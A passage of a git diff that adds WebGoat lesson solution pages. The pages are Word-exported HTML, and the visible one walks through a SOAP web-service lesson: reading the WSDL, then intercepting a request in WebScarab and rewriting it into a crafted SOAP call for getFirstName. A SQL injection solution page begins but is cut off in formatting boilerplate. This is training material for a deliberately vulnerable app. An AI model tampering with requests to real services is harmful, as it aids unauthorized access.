+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_13" o:spid="_x0000_i1029" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/SoapRequest_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/SoapRequest_files/image002.jpg" v:shapes="Picture_x0020_13"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> - Lesson 21</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<h2><span style='color:windowtext'>Solution:<o:p></o:p></span></h2>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Click on the
+URL “WebGoat WSDL” to examine the Webservices Description Language file.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_14"
+ o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/SoapRequest_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/SoapRequest_files/image004.jpg" v:shapes="Picture_x0020_14"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> - WSDL<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Count the
+number of operations like getFirstName. There are 4 operations defined.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_15"
+ o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/SoapRequest_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/SoapRequest_files/image006.jpg" v:shapes="Picture_x0020_15"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Enter the ID<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>For the next
+question the getFirstNameRequest method uses an int as parameter type. Enter
+int and click “Submit”.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_16"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/SoapRequest_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/SoapRequest_files/image008.jpg" v:shapes="Picture_x0020_16"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Stage 2 Completed<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Intercept the
+HTTP Request with WebScarab and click on the “Raw” tab. Make sure that
+“Intercept Responses” is selected.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<ol style='margin-top:0cm' start=1 type=1>
+ <li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
+     style='font-family:"Arial","sans-serif"'>Change the POST header to open
+     the SoapRequest. <o:p></o:p></span></li>
+ <li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
+     style='font-family:"Arial","sans-serif"'>Change the Content-Type to
+     text/xml. <o:p></o:p></span></li>
+ <li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
+     style='font-family:"Arial","sans-serif"'>Add a header SOAPAction. <o:p></o:p></span></li>
+ <li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
+     style='font-family:"Arial","sans-serif"'>Append the XML envelope to the
+     request<o:p></o:p></span></li>
+</ol>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>POST
+http://neo:80/WebGoat/services/SoapRequest HTTP/1.1<o:p></o:p></span></p>
+
+<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>Content-Type:
+text/xml<o:p></o:p></span></p>
+
+<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>SOAPAction:
+<o:p></o:p></span></p>
+
+<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>&lt;?xml
+version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt; <o:p></o:p></span></p>
+
+<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>&lt;SOAP-ENV:Envelope
+xmlns:SOAP-ENV=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; <o:p></o:p></span></p>
+
+<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;
+<o:p></o:p></span></p>
+
+<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;&gt;
+<o:p></o:p></span></p>
+
+<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>  </span>&lt;SOAP-ENV:Body&gt; <o:p></o:p></span></p>
+
+<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>    </span>&lt;ns1:getFirstName
+SOAP-ENV:encodingStyle=&quot;http://schemas.xmlsoap.org/soap/encoding/&quot;
+xmlns:ns1=&quot;http://lessons&quot;&gt; <o:p></o:p></span></p>
+
+<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>    </span></span><span lang=FR style='font-family:
+"Arial","sans-serif";mso-ansi-language:FR'>&lt;id
+xsi:type=&quot;xsd:int&quot;&gt;101&lt;/id&gt; <o:p></o:p></span></p>
+
+<p class=MsoNormal style='margin-left:36.0pt'><span lang=FR style='font-family:
+"Arial","sans-serif";mso-ansi-language:FR'><span style='mso-spacerun:yes'>   
+</span></span><span style='font-family:"Arial","sans-serif"'>&lt;/ns1:getFirstName&gt;
+<o:p></o:p></span></p>
+
+<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>  </span>&lt;/SOAP-ENV:Body&gt; <o:p></o:p></span></p>
+
+<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>&lt;/SOAP-ENV:Envelope&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The response
+is Joe.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_17"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square' filled="t" fillcolor="yellow">
+ <v:imagedata src="/WebGoat/lesson_solutions/SoapRequest_files/image009.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/SoapRequest_files/image010.jpg" v:shapes="Picture_x0020_17"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Intercept response<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/SoapRequest_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/SoapRequest_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/SoapRequest_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/SoapRequest_files/filelist.xml b/main/project/WebContent/lesson_solutions/SoapRequest_files/filelist.xml
new file mode 100644
index 000000000..2c3012bc9
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/SoapRequest_files/filelist.xml
@@ -0,0 +1,16 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../SoapRequest.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image002.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image004.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image006.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image008.jpg"/>
+ <o:File HRef="image009.png"/>
+ <o:File HRef="image010.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/SoapRequest_files/image001.png b/main/project/WebContent/lesson_solutions/SoapRequest_files/image001.png
new file mode 100644
index 000000000..baa4ba50f
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SoapRequest_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/SoapRequest_files/image002.jpg b/main/project/WebContent/lesson_solutions/SoapRequest_files/image002.jpg
new file mode 100644
index 000000000..f9ab80c9b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SoapRequest_files/image002.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/SoapRequest_files/image003.png b/main/project/WebContent/lesson_solutions/SoapRequest_files/image003.png
new file mode 100644
index 000000000..ab5ed9af8
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SoapRequest_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/SoapRequest_files/image004.jpg b/main/project/WebContent/lesson_solutions/SoapRequest_files/image004.jpg
new file mode 100644
index 000000000..c12c37f71
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SoapRequest_files/image004.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/SoapRequest_files/image005.png b/main/project/WebContent/lesson_solutions/SoapRequest_files/image005.png
new file mode 100644
index 000000000..f46b3b8f7
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SoapRequest_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/SoapRequest_files/image006.jpg b/main/project/WebContent/lesson_solutions/SoapRequest_files/image006.jpg
new file mode 100644
index 000000000..d7c4069ba
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SoapRequest_files/image006.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/SoapRequest_files/image007.png b/main/project/WebContent/lesson_solutions/SoapRequest_files/image007.png
new file mode 100644
index 000000000..a841fc1d5
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SoapRequest_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/SoapRequest_files/image008.jpg b/main/project/WebContent/lesson_solutions/SoapRequest_files/image008.jpg
new file mode 100644
index 000000000..2d4b523a5
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SoapRequest_files/image008.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/SoapRequest_files/image009.png b/main/project/WebContent/lesson_solutions/SoapRequest_files/image009.png
new file mode 100644
index 000000000..2b7656cc1
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SoapRequest_files/image009.png differ
diff --git a/main/project/WebContent/lesson_solutions/SoapRequest_files/image010.jpg b/main/project/WebContent/lesson_solutions/SoapRequest_files/image010.jpg
new file mode 100644
index 000000000..910fb47dc
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SoapRequest_files/image010.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/SoapRequest_files/themedata.thmx b/main/project/WebContent/lesson_solutions/SoapRequest_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SoapRequest_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/SqlNumericInjection.html b/main/project/WebContent/lesson_solutions/SqlNumericInjection.html
new file mode 100644
index 000000000..b2cdc9750
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/SqlNumericInjection.html
@@ -0,0 +1,715 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/SqlNumericInjection_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/SqlNumericInjection_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>2</o:Revision>
+  <o:TotalTime>36</o:TotalTime>
+  <o:Created>2007-07-11T11:07:00Z</o:Created>
+  <o:LastSaved>2007-07-11T11:07:00Z</o:LastSaved>
+  <o:Pages>1</o:Pages>
+  <o:Words>86</o:Words>
+  <o:Characters>495</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>4</o:Lines>
+  <o:Paragraphs>1</o:Paragraphs>
+  <o:CharactersWithSpaces>580</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/SqlNumericInjection_files/themedata.thmx">
+<link rel=colorSchemeMapping
+href="/WebGoat/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
